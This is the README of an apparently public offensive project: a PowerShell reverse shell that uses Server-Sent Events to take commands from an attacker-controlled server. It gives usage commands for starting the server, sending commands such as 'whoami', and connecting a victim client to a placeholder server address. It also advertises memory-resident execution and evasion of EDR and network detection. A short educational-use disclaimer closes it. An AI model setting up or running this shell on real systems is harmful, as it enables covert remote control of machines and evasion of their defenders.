This project demonstrates a stealthy reverse shell built using native PowerShell and Server-Sent Events (SSE) — a simple HTTP-based protocol that pushes messages from server to client over a single persistent connection.
Unlike traditional reverse shells that rely on polling, sockets, or external binaries, this one uses only:
- Native PowerShell
- A single GET request
- text/event-stream over HTTP
- Memory-resident execution with minimal noise
The SSE server:
- Listens on a specified port using raw TCP
- Pushes commands to clients via SSE
- Receives command output via HTTP POST (/post endpoint)
- Optional interactive terminal or headless mode
The SSE client:
- Connects to the server’s /sse endpoint
- Receives commands via SSE stream
- Executes them locally and posts results back
. .\Start-SseServer.ps1
Start-SseServer -Port 8080
Start-SseServer -Port 8080 -Headless
(iwr http://<SSE_Server_IP_Address>:8080/command -Method POST -Body "whoami" -ContentType "text/plain" -UseBasicParsing).Content
. .\Start-SseClient.ps1
Start-SseClient -Uri "http://<server-ip>:8080"
- Fully memory-resident execution
- No need for raw sockets or polling loops
- Can bypass basic EDR/network detections
- Minimalist, stealthy, and flexible
This tool is for educational and research purposes only. Do not use this on networks or systems you do not own or have explicit permission to test.
MIT License
Author: TNCX-byte